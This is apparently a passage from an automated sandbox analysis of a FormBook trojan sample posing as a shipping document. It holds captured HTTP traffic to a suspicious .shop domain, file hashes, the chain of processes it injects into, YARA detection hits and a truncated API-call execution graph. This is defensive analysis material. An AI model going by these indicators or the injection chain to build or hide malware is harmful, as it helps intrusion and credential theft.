                                                          Data Raw: 31 48 67 3d 46 55 66 61 45 76 35 70 47 72 76 33 44 2b 42 4e 66 77 32 78 66 49 4f 77 48 77 41 79 68 41 30 34 44 79 45 37 7a 61 4e 35 51 42 59 53 39 4c 48 77 4b 4e 43 66 36 35 54 36 4f 44 48 48 2b 68 79 42 5a 61 55 75 77 51 6b 58 55 7a 70 65 68 79 59 31 2b 71 41 53 44 4f 54 33 38 36 44 71 46 70 39 2b 54 50 2f 52 69 52 42 6a 67 32 6d 53 47 30 38 73 61 54 33 76 66 4c 79 4e 6b 63 42 32 4c 57 37 4f 2b 57 68 39 72 79 56 6a 30 41 56 42 6f 67 33 54 52 78 67 33 64 7a 75 36 35 52 44 6a 70 79 33 52 51 35 69 6c 51 34 75 46 6c 6b 49 73 47 6f 78 36 75 62 78 65 67 31 57 50 43 55 31 78 6a 6e 6e 34 50 32 4b 77 4f 34 4f 32 39 6d 76 6a 6d 35 65 58 45 52 47 4c 50 7a 35 49 75 43 73 59
                                                          Data Ascii: 1Hg=FUfaEv5pGrv3D+BNfw2xfIOwHwAyhA04DyE7zaN5QBYS9LHwKNCf65T6ODHH+hyBZaUuwQkXUzpehyY1+qASDOT386DqFp9+TP/RiRBjg2mSG08saT3vfLyNkcB2LW7O+Wh9ryVj0AVBog3TRxg3dzu65RDjpy3RQ5ilQ4uFlkIsGox6ubxeg1WPCU1xjnn4P2KwO4O29mvjm5eXERGLPz5IuCsY
                                                          Jul 26, 2024 18:48:02.001708031 CEST433INHTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:48:01 GMT
                                                          Server: Apache
                                                          Content-Length: 269
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 78 61 77 63 66 7a 63 71 6c 39 74 63 76 6a 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.xawcfzcql9tcvj.shop Port 80</address></body></html>


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:12:44:52
                                                          Start date:26/07/2024
                                                          Path:C:\Users\user\Desktop\Final Shipping Document.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Final Shipping Document.exe"
                                                          Imagebase:0xba0000
                                                          File size:1'225'216 bytes
                                                          MD5 hash:2D3ECAF3008E1D47782F668F713B35B1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:12:44:53
                                                          Start date:26/07/2024
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Final Shipping Document.exe"
                                                          Imagebase:0x5e0000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2370426785.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2370426785.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2370049764.0000000003220000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2370049764.0000000003220000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2369314894.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2369314894.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:12:45:19
                                                          Start date:26/07/2024
                                                          Path:C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe"
                                                          Imagebase:0x1a0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:5
                                                          Start time:12:45:20
                                                          Start date:26/07/2024
                                                          Path:C:\Windows\SysWOW64\gpupdate.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\gpupdate.exe"
                                                          Imagebase:0xa90000
                                                          File size:25'088 bytes
                                                          MD5 hash:6DC3720EA74B49C8ED64ACA3E0162AC8
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3888449538.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3888449538.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:7
                                                          Start time:12:45:43
                                                          Start date:26/07/2024
                                                          Path:C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe"
                                                          Imagebase:0x1a0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3892567751.0000000005550000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3892567751.0000000005550000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:8
                                                          Start time:12:45:57
                                                          Start date:26/07/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff79f9e0000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:3.1%
                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                            Signature Coverage:3%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:63
                                                            execution_graph 97933 bdcabc 97934 bdcac5 97933->97934 97936 bdcace 97933->97936 97937 bdc9bb 97934->97937 97957 bd2d74 GetLastError 97937->97957 97939 bdc9c8 97978 bdcada 97939->97978 97941 bdc9d0 97987 bdc74f 97941->97987 97944 bdc9e7 97944->97936 97947 bdca2a 98003 bd29c8 97947->98003 97950 bdca1d 97951 bdca25 97950->97951 97954 bdca42 97950->97954 98002 bcf2d9 20 API calls __dosmaperr 97951->98002 97953 bdca6e 97953->97947 98009 bdc625 26 API calls 97953->98009 97954->97953 97955 bd29c8 _free 20 API calls 97954->97955 97955->97953 97958 bd2d8a 97957->97958 97959 bd2d96 97957->97959 98010 bd320e 11 API calls 2 library calls 97958->98010 98011 bd4c7d 20 API calls __dosmaperr 97959->98011 97962 bd2d90 97962->97959 97964 bd2ddf SetLastError 97962->97964 97963 bd2da2 97965 bd2daa 97963->97965 98012 bd3264 11 API calls 2 library calls 97963->98012 97964->97939 97967 bd29c8 _free 20 API calls 97965->97967 97970 bd2db0 97967->97970 97968 bd2dbf 97968->97965 97969 bd2dc6 97968->97969 98013 bd2be6 20 API calls __dosmaperr 97969->98013 97972 bd2deb SetLastError 97970->97972 98014 bd28a7 38 API calls _abort 97972->98014 97973 bd2dd1 97975 bd29c8 _free 20 API calls 97973->97975 97977 bd2dd8 97975->97977 97977->97964 97977->97972 97979 bdcae6 BuildCatchObjectHelperInternal 97978->97979 97980 bd2d74 BuildCatchObjectHelperInternal 38 API calls 97979->97980 97985 bdcaf0 97980->97985 97982 bdcb74 __wsopen_s 97982->97941 97985->97982 97986 bd29c8 _free 20 API calls 97985->97986 98015 bd28a7 38 API calls _abort 97985->98015 98016 bd2f5e EnterCriticalSection 97985->98016 98017 bdcb6b LeaveCriticalSection _abort 97985->98017 97986->97985 98018 bc49a5 97987->98018 97990 bdc770 GetOEMCP 97992 bdc799 97990->97992 97991 bdc782 97991->97992 97993 bdc787 GetACP 97991->97993 97992->97944 97994 bd3820 97992->97994 97993->97992 97995 bd385e 97994->97995 97999 bd382e __dosmaperr 97994->97999 98029 bcf2d9 20 API calls __dosmaperr 97995->98029 97997 bd3849 RtlAllocateHeap 97998 bd385c 97997->97998 97997->97999 97998->97947 98001 bdcb7c 51 API calls 2 library calls 97998->98001 97999->97995 97999->97997 98028 bc4ead 7 API calls 2 library calls 97999->98028 98001->97950 98002->97947 98004 bd29d3 RtlFreeHeap 98003->98004 98008 bd29fc __dosmaperr 98003->98008 98005 bd29e8 98004->98005 98004->98008 98030 bcf2d9 20 API calls __dosmaperr 98005->98030 98007 bd29ee GetLastError 98007->98008 98008->97944 98009->97947 98010->97962 98011->97963 98012->97968 98013->97973 98016->97985 98017->97985 98019 bc49c2 98018->98019 98025 bc49b8 98018->98025 98020 bd2d74 BuildCatchObjectHelperInternal 38 API calls 98019->98020 98019->98025 98021 bc49e3 98020->98021 98026 bd2ec3 38 API calls _strftime 98021->98026 98023 bc49fc 98027 bd2ef0 38 API calls _strftime 98023->98027 98025->97990 98025->97991 98026->98023 98027->98025 98028->97999 98029->97998 98030->98007 98031 ba105b 98036 ba344d 98031->98036 98033 ba106a 98067 bc00a3 29 API calls __onexit 98033->98067 98035 ba1074 98037 ba345d __wsopen_s 98036->98037 98068 baa961 98037->98068 98041 ba351c 98080 ba3357 98041->98080 98048 baa961 22 API calls 98049 ba354d 98048->98049 98101 baa6c3 98049->98101 98052 be3176 RegQueryValueExW 98053 be320c RegCloseKey 98052->98053 98054 be3193 98052->98054 98056 ba3578 98053->98056 98064 be321e _wcslen 98053->98064 98107 bbfe0b 98054->98107 98056->98033 98057 be31ac 98117 ba5722 98057->98117 98060 be31d4 98120 ba6b57 98060->98120 98062 be31ee ISource 98062->98053 98063 ba4c6d 22 API calls 98063->98064 98064->98056 98064->98063 98066 ba515f 22 API calls 98064->98066 98132 ba9cb3 98064->98132 98066->98064 98067->98035 98069 bbfe0b 22 API calls 98068->98069 98070 baa976 98069->98070 98138 bbfddb 98070->98138 98072 ba3513 98073 ba3a5a 98072->98073 98160 be1f50 98073->98160 98076 ba9cb3 22 API calls 98077 ba3a8d 98076->98077 98162 ba3aa2 98077->98162 98079 ba3a97 98079->98041 98081 be1f50 __wsopen_s 98080->98081 98082 ba3364 GetFullPathNameW 98081->98082 98083 ba3386 98082->98083 98084 ba6b57 22 API calls 98083->98084 98085 ba33a4 98084->98085 98086 ba33c6 98085->98086 98087 be30bb 98086->98087 98088 ba33dd 98086->98088 98090 bbfddb 22 API calls 98087->98090 98186 ba33ee 98088->98186 98092 be30c5 _wcslen 98090->98092 98091 ba33e8 98095 ba515f 98091->98095 98093 bbfe0b 22 API calls 98092->98093 98094 be30fe __fread_nolock 98093->98094 98096 ba518f __fread_nolock 98095->98096 98097 ba516e 98095->98097 98098 bbfddb 22 API calls 98096->98098 98099 bbfe0b 22 API calls 98097->98099 98100 ba3544 98098->98100 98099->98096 98100->98048 98102 baa6dd 98101->98102 98103 ba3556 RegOpenKeyExW 98101->98103 98104 bbfddb 22 API calls 98102->98104 98103->98052 98103->98056 98105 baa6e7 98104->98105 98106 bbfe0b 22 API calls 98105->98106 98106->98103 98109 bbfddb 98107->98109 98108 bcea0c ___std_exception_copy 21 API calls 98108->98109 98109->98108 98110 bbfdfa 98109->98110 98113 bbfdfc 98109->98113 98201 bc4ead 7 API calls 2 library calls 98109->98201 98110->98057 98112 bc066d 98203 bc32a4 RaiseException 98112->98203 98113->98112 98202 bc32a4 RaiseException 98113->98202 98116 bc068a 98116->98057 98118 bbfddb 22 API calls 98117->98118 98119 ba5734 RegQueryValueExW 98118->98119 98119->98060 98119->98062 98121 ba6b67 _wcslen 98120->98121 98122 be4ba1 98120->98122 98125 ba6b7d 98121->98125 98126 ba6ba2 98121->98126 98123 ba93b2 22 API calls 98122->98123 98124 be4baa 98123->98124 98124->98124 98204 ba6f34 22 API calls 98125->98204 98128 bbfddb 22 API calls 98126->98128 98129 ba6bae 98128->98129 98130 bbfe0b 22 API calls 98129->98130 98131 ba6b85 __fread_nolock 98130->98131 98131->98062 98133 ba9cc2 _wcslen 98132->98133 98134 bbfe0b 22 API calls 98133->98134 98135 ba9cea __fread_nolock 98134->98135 98136 bbfddb 22 API calls 98135->98136 98137 ba9d00 98136->98137 98137->98064 98139 bbfde0 98138->98139 98141 bbfdfa 98139->98141 98144 bbfdfc 98139->98144 98148 bcea0c 98139->98148 98155 bc4ead 7 API calls 2 library calls 98139->98155 98141->98072 98143 bc066d 98157 bc32a4 RaiseException 98143->98157 98144->98143 98156 bc32a4 RaiseException 98144->98156 98147 bc068a 98147->98072 98153 bd3820 __dosmaperr 98148->98153 98149 bd385e 98159 bcf2d9 20 API calls __dosmaperr 98149->98159 98151 bd3849 RtlAllocateHeap 98152 bd385c 98151->98152 98151->98153 98152->98139 98153->98149 98153->98151 98158 bc4ead 7 API calls 2 library calls 98153->98158 98155->98139 98156->98143 98157->98147 98158->98153 98159->98152 98161 ba3a67 GetModuleFileNameW 98160->98161 98161->98076 98163 be1f50 __wsopen_s 98162->98163 98164 ba3aaf GetFullPathNameW 98163->98164 98165 ba3ae9 98164->98165 98166 ba3ace 98164->98166 98167 baa6c3 22 API calls 98165->98167 98168 ba6b57 22 API calls 98166->98168 98169 ba3ada 98167->98169 98168->98169 98172 ba37a0 98169->98172 98173 ba37ae 98172->98173 98176 ba93b2 98173->98176 98175 ba37c2 98175->98079 98177 ba93c0 98176->98177 98178 ba93c9 __fread_nolock 98176->98178 98177->98178 98180 baaec9 98177->98180 98178->98175 98178->98178 98181 baaed9 __fread_nolock 98180->98181 98182 baaedc 98180->98182 98181->98178 98183 bbfddb 22 API calls 98182->98183 98184 baaee7 98183->98184 98185 bbfe0b 22 API calls 98184->98185 98185->98181 98187 ba33fe _wcslen 98186->98187 98188 be311d 98187->98188 98189 ba3411 98187->98189 98191 bbfddb 22 API calls 98188->98191 98196 baa587 98189->98196 98193 be3127 98191->98193 98192 ba341e __fread_nolock 98192->98091 98194 bbfe0b 22 API calls 98193->98194 98195 be3157 __fread_nolock 98194->98195 98197 baa59d 98196->98197 98200 baa598 __fread_nolock 98196->98200 98198 bbfe0b 22 API calls 98197->98198 98199 bef80f 98197->98199 98198->98200 98200->98192 98201->98109 98202->98112 98203->98116 98204->98131 98205 ba1098 98210 ba42de 98205->98210 98209 ba10a7 98211 baa961 22 API calls 98210->98211 98212 ba42f5 GetVersionExW 98211->98212 98213 ba6b57 22 API calls 98212->98213 98214 ba4342 98213->98214 98215 ba93b2 22 API calls 98214->98215 98217 ba4378 98214->98217 98216 ba436c 98215->98216 98219 ba37a0 22 API calls 98216->98219 98218 ba441b GetCurrentProcess IsWow64Process 98217->98218 98225 be37df 98217->98225 98220 ba4437 98218->98220 98219->98217 98221 ba444f LoadLibraryA 98220->98221 98222 be3824 GetSystemInfo 98220->98222 98223 ba449c GetSystemInfo 98221->98223 98224 ba4460 GetProcAddress 98221->98224 98227 ba4476 98223->98227 98224->98223 98226 ba4470 GetNativeSystemInfo 98224->98226 98226->98227 98228 ba447a FreeLibrary 98227->98228 98229 ba109d 98227->98229 98228->98229 98230 bc00a3 29 API calls __onexit 98229->98230 98230->98209 98231 bfd8dd GetTempPathW 98232 bfd8fa 98231->98232 98233 baf7bf 98234 baf7d3 98233->98234 98235 bafcb6 98233->98235 98237 bafcc2 98234->98237 98238 bbfddb 22 API calls 98234->98238 98326 baaceb 23 API calls ISource 98235->98326 98327 baaceb 23 API calls ISource 98237->98327 98240 baf7e5 98238->98240 98240->98237 98241 baf83e 98240->98241 98242 bafd3d 98240->98242 98259 baed9d ISource 98241->98259 98268 bb1310 98241->98268 98328 c11155 22 API calls 98242->98328 98245 bf4beb 98336 c1359c 82 API calls __wsopen_s 98245->98336 98248 bafef7 98255 baa8c7 22 API calls 98248->98255 98248->98259 98249 bbfddb 22 API calls 98266 baec76 ISource 98249->98266 98250 bf4b0b 98334 c1359c 82 API calls __wsopen_s 98250->98334 98251 baa8c7 22 API calls 98251->98266 98252 bf4600 98252->98259 98329 baa8c7 98252->98329 98255->98259 98258 bc0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98258->98266 98260 bafbe3 98260->98259 98263 bf4bdc 98260->98263 98267 baf3ae ISource 98260->98267 98261 baa961 22 API calls 98261->98266 98262 bc00a3 29 API calls pre_c_initialization 98262->98266 98335 c1359c 82 API calls __wsopen_s 98263->98335 98265 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98265->98266 98266->98245 98266->98248 98266->98249 98266->98250 98266->98251 98266->98252 98266->98258 98266->98259 98266->98260 98266->98261 98266->98262 98266->98265 98266->98267 98324 bb01e0 256 API calls 2 library calls 98266->98324 98325 bb06a0 41 API calls ISource 98266->98325 98267->98259 98333 c1359c 82 API calls __wsopen_s 98267->98333 98269 bb17b0 98268->98269 98270 bb1376 98268->98270 98584 bc0242 5 API calls __Init_thread_wait 98269->98584 98271 bb1390 98270->98271 98272 bf6331 98270->98272 98337 bb1940 98271->98337 98275 bf633d 98272->98275 98589 c2709c 256 API calls 98272->98589 98275->98266 98277 bb17ba 98279 bb17fb 98277->98279 98281 ba9cb3 22 API calls 98277->98281 98283 bf6346 98279->98283 98285 bb182c 98279->98285 98280 bb1940 9 API calls 98282 bb13b6 98280->98282 98288 bb17d4 98281->98288 98282->98279 98284 bb13ec 98282->98284 98590 c1359c 82 API calls __wsopen_s 98283->98590 98284->98283 98308 bb1408 __fread_nolock 98284->98308 98586 baaceb 23 API calls ISource 98285->98586 98585 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98288->98585 98289 bb1839 98587 bbd217 256 API calls 98289->98587 98291 bf636e 98591 c1359c 82 API calls __wsopen_s 98291->98591 98293 bb152f 98295 bb153c 98293->98295 98296 bf63d1 98293->98296 98298 bb1940 9 API calls 98295->98298 98593 c25745 54 API calls _wcslen 98296->98593 98299 bb1549 98298->98299 98305 bb1940 9 API calls 98299->98305 98314 bb15c7 ISource 98299->98314 98300 bbfddb 22 API calls 98300->98308 98301 bb1872 98588 bbfaeb 23 API calls 98301->98588 98302 bbfe0b 22 API calls 98302->98308 98303 bb171d 98303->98266 98312 bb1563 98305->98312 98308->98289 98308->98291 98308->98293 98308->98300 98308->98302 98313 bf63b2 98308->98313 98308->98314 98347 baec40 98308->98347 98309 bb167b ISource 98309->98303 98583 bbce17 22 API calls ISource 98309->98583 98311 bb1940 9 API calls 98311->98314 98312->98314 98316 baa8c7 22 API calls 98312->98316 98592 c1359c 82 API calls __wsopen_s 98313->98592 98314->98301 98314->98309 98314->98311 98371 c16ef1 98314->98371 98451 c2958b 98314->98451 98454 bbeffa 98314->98454 98511 c1744a 98314->98511 98568 c1f0ec 98314->98568 98577 c0d4ce 98314->98577 98580 c2959f 98314->98580 98594 c1359c 82 API calls __wsopen_s 98314->98594 98316->98314 98324->98266 98325->98266 98326->98237 98327->98242 98328->98259 98330 baa8ea __fread_nolock 98329->98330 98331 baa8db 98329->98331 98330->98259 98331->98330 98332 bbfe0b 22 API calls 98331->98332 98332->98330 98333->98259 98334->98259 98335->98245 98336->98259 98338 bb1981 98337->98338 98340 bb195d 98337->98340 98595 bc0242 5 API calls __Init_thread_wait 98338->98595 98339 bb13a0 98339->98280 98340->98339 98597 bc0242 5 API calls __Init_thread_wait 98340->98597 98342 bb198b 98342->98340 98596 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98342->98596 98344 bb8727 98344->98339 98598 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98344->98598 98369 baec76 ISource 98347->98369 98348 bc0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98348->98369 98349 bbfddb 22 API calls 98349->98369 98350 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98350->98369 98351 bafef7 98358 baa8c7 22 API calls 98351->98358 98364 baed9d ISource 98351->98364 98354 bf4b0b 98602 c1359c 82 API calls __wsopen_s 98354->98602 98355 bf4600 98359 baa8c7 22 API calls 98355->98359 98355->98364 98358->98364 98359->98364 98361 baa8c7 22 API calls 98361->98369 98362 bafbe3 98362->98364 98365 bf4bdc 98362->98365 98370 baf3ae ISource 98362->98370 98363 baa961 22 API calls 98363->98369 98364->98308 98603 c1359c 82 API calls __wsopen_s 98365->98603 98367 bc00a3 29 API calls pre_c_initialization 98367->98369 98368 bf4beb 98604 c1359c 82 API calls __wsopen_s 98368->98604 98369->98348 98369->98349 98369->98350 98369->98351 98369->98354 98369->98355 98369->98361 98369->98362 98369->98363 98369->98364 98369->98367 98369->98368 98369->98370 98599 bb01e0 256 API calls 2 library calls 98369->98599 98600 bb06a0 41 API calls ISource 98369->98600 98370->98364 98601 c1359c 82 API calls __wsopen_s 98370->98601 98372 baa961 22 API calls 98371->98372 98373 c16f1d 98372->98373 98374 baa961 22 API calls 98373->98374 98375 c16f26 98374->98375 98376 c16f3a 98375->98376 98813 bab567 98375->98813 98605 ba7510 98376->98605 98379 c16fbc 98381 ba7510 53 API calls 98379->98381 98380 c170bf 98628 ba4ecb 98380->98628 98383 c16fc8 98381->98383 98388 baa8c7 22 API calls 98383->98388 98393 c16fdb 98383->98393 98385 c16f57 _wcslen 98385->98379 98385->98380 98450 c170e9 98385->98450 98386 c170e5 98387 baa961 22 API calls 98386->98387 98386->98450 98390 c1711a 98387->98390 98388->98393 98389 ba4ecb 94 API calls 98389->98386 98391 baa961 22 API calls 98390->98391 98395 c17126 98391->98395 98392 c17027 98394 ba7510 53 API calls 98392->98394 98393->98392 98396 c17005 98393->98396 98399 baa8c7 22 API calls 98393->98399 98397 c17034 98394->98397 98398 baa961 22 API calls 98395->98398 98400 ba33c6 22 API calls 98396->98400 98401 c17047 98397->98401 98402 c1703d 98397->98402 98403 c1712f 98398->98403 98399->98396 98404 c1700f 98400->98404 98818 c0e199 GetFileAttributesW 98401->98818 98406 baa8c7 22 API calls 98402->98406 98408 baa961 22 API calls 98403->98408 98405 ba7510 53 API calls 98404->98405 98409 c1701b 98405->98409 98406->98401 98411 c17138 98408->98411 98412 ba6350 22 API calls 98409->98412 98410 c17050 98413 c17063 98410->98413 98416 ba4c6d 22 API calls 98410->98416 98414 ba7510 53 API calls 98411->98414 98412->98392 98415 ba7510 53 API calls 98413->98415 98423 c17069 98413->98423 98417 c17145 98414->98417 98418 c170a0 98415->98418 98416->98413 98650 ba525f 98417->98650 98819 c0d076 57 API calls 98418->98819 98421 c17166 98692 ba4c6d 98421->98692 98423->98450 98425 c171a9 98427 baa8c7 22 API calls 98425->98427 98426 ba4c6d 22 API calls 98428 c17186 98426->98428 98429 c171ba 98427->98429 98428->98425 98431 ba6b57 22 API calls 98428->98431 98695 ba6350 98429->98695 98433 c1719b 98431->98433 98435 ba6b57 22 API calls 98433->98435 98434 ba6350 22 API calls 98436 c171d6 98434->98436 98435->98425 98437 ba6350 22 API calls 98436->98437 98438 c171e4 98437->98438 98439 ba7510 53 API calls 98438->98439 98440 c171f0 98439->98440 98704 c0d7bc 98440->98704 98442 c17201 98443 c0d4ce 4 API calls 98442->98443 98444 c1720b 98443->98444 98445 ba7510 53 API calls 98444->98445 98449 c17239 98444->98449 98446 c17229 98445->98446 98758 c12947 98446->98758 98820 ba4f39 98449->98820 98450->98314 99455 c27f59 98451->99455 98453 c2959b 98453->98314 99547 ba9c6e 98454->99547 98457 bbfddb 22 API calls 98459 bbf02b 98457->98459 98460 bbfe0b 22 API calls 98459->98460 98462 bbf03c 98460->98462 98461 bff0a8 98501 bbf0a4 98461->98501 99617 c19caa 39 API calls 98461->99617 99585 ba6246 98462->99585 98465 bab567 39 API calls 98466 bff10a 98465->98466 98468 bbf0b1 98466->98468 98469 bff112 98466->98469 98467 baa961 22 API calls 98470 bbf04f 98467->98470 99561 bbfa5b 98468->99561 98471 bab567 39 API calls 98469->98471 98472 ba6246 CloseHandle 98470->98472 98478 bbf0b8 98471->98478 98474 bbf056 98472->98474 98475 ba7510 53 API calls 98474->98475 98476 bbf062 98475->98476 98477 ba6246 CloseHandle 98476->98477 98479 bbf06c 98477->98479 98480 bff127 98478->98480 98481 bbf0d3 98478->98481 99589 ba5745 98479->99589 98484 bbfe0b 22 API calls 98480->98484 99566 ba6270 98481->99566 98487 bff12c 98484->98487 98495 bff140 98487->98495 99618 bbf866 ReadFile SetFilePointerEx 98487->99618 98488 bff0a0 99616 ba6216 CloseHandle ISource 98488->99616 98492 bbf085 99597 ba53de 98492->99597 98493 bbf0ea 98499 bff144 __fread_nolock 98493->98499 99613 ba62b5 22 API calls 98493->99613 98495->98499 99619 c10e85 22 API calls ___scrt_fastfail 98495->99619 98498 bbf093 99612 ba53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98498->99612 98501->98465 98501->98468 98502 bbf0fe 98505 bbf138 98502->98505 98506 ba6246 CloseHandle 98502->98506 98503 bff069 99615 c0ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98503->99615 98504 bbf09a 98504->98501 98504->98503 98505->98314 98507 bbf12c 98506->98507 98507->98505 99614 ba6216 CloseHandle ISource 98507->99614 98509 bff080 98509->98501 98512 c17469 98511->98512 98513 